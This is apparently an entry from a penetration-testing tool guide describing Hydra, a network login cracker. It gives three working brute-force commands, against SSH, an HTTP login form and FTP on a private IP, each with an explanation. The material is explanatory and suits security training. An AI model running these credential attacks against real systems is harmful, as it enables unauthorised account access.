3. Hydra
Description:
Hydra is a parallelized network login cracker that supports many protocols, including FTP, SSH, HTTP, HTTPS, and more. It performs brute-force attacks on login credentials, making it an essential tool for penetration testers.
Examples:
- SSH Brute Force Attack:
- hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
- SSH Brute Force Attack:
Explanation: Attempts to brute-force SSH login on the target IP (192.168.1.10) using the username username and the password wordlist rockyou.txt.
- HTTP Login Attack:
- hydra -L users.txt -P passwords.txt 192.168.1.10 http-post-form “/login.php:user=^USER^&pass=^PASS^:F=incorrect”
- HTTP Login Attack:
Explanation: Brute-forces the HTTP login form on 192.168.1.10 using the list of usernames (users.txt) and passwords (passwords.txt). The F=incorrect flag looks for the string “incorrect” in the response to detect failed login attempts.
- FTP Login Attack:
- hydra -l admin -P passwords.txt ftp://192.168.1.10
- FTP Login Attack:
Explanation: Attempts to brute-force the FTP login of the target using the username admin and the password list passwords.txt.